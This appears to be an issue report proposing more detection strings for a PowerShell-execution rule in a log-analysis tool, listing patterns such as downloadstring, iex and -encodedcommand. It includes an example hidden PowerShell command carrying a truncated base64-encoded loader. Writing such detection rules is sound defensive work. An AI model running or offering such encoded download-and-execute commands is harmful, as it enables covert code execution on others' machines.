In the Powershell_Execution rule of ./app/utils/Dracarys/Rhaegal/rules/malicious/rules.gh, it is only condition to catch text in Data like below:
Event.EventData.Data.#text:
- "downloadstring"
- "downloadfile"
- "iex"
- "* -e *"

And there is another way to encode the command: -encodedcommand

Suggestion: Add string:
- "* -encodedcommand *"

More strings should be added:
- "FromBase64String"
- "* -File "
- " -ExecutionPolicy ByPass *"

Here is an example payload:

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBhAFcALwBpAFMAaABiADkAbgBQAHcASwBmADQAZwBFAEsASQBU

the embedded Rhaegal is not enough to be honest, there is a lot of options not included, but it is a sample that help to create more custom rules